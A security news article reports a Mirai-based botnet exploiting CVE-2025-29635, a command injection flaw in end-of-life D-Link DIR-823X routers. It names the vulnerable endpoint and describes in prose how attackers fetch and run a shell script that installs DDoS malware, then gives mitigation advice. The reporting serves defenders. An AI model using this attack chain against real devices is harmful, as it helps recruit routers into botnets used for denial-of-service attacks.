Mirai Botnet Exploits Critical RCE Flaw in End-of-Life D-Link Routers

CISA reports that a new Mirai-based malware campaign is actively exploiting a high-severity command injection vulnerability in end-of-life D-Link DIR-823X routers to recruit devices into a growing botnet. 

The flaw is tracked as CVE-2025-29635 (CVSS score 7.5), allows an authorized attacker to execute arbitrary commands on remote devices by sending a crafted POST request to the /goform/set_prohibiting endpoint, triggering remote code execution (RCE). It was first reported 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting, who briefly published a proof-of-concept exploit on GitHub before retracting it. 

Akamai's Security Intelligence Response Team (SIRT) detected the first in-the-wild active exploitation attempts in early March 2026 through its global network of honeypots.

According to Akamai's observations, attackers are sending POST requests that change directories across writable paths, download a shell script named dlink.sh from an external IP, and execute it. The script installs a Mirai-based malware variant dubbed "tuxnokill," which supports multiple architectures and features the standard Mirai distributed denial-of-service (DDoS) attack repertoire, including TCP SYN/ACK/STOMP floods, UDP floods, and HTTP null attacks.

The impacted D-Link DIR-823X devices  running firmware versions 240126 and 24082 reached end-of-life (EoL) status in November 2024, so the latest firmware available for the model does not patch CVE-2025-29635. D-Link does not make exceptions to its EoL policy even when active exploitation is detected, so a fixing patch is unlikely to be released. 

Users operating EoL routers are strongly advised to upgrade to a newer model that receives active support with frequent security fixes. Minimal mitiation is disabling remote administration portals when not needed and changing default administrator credentials.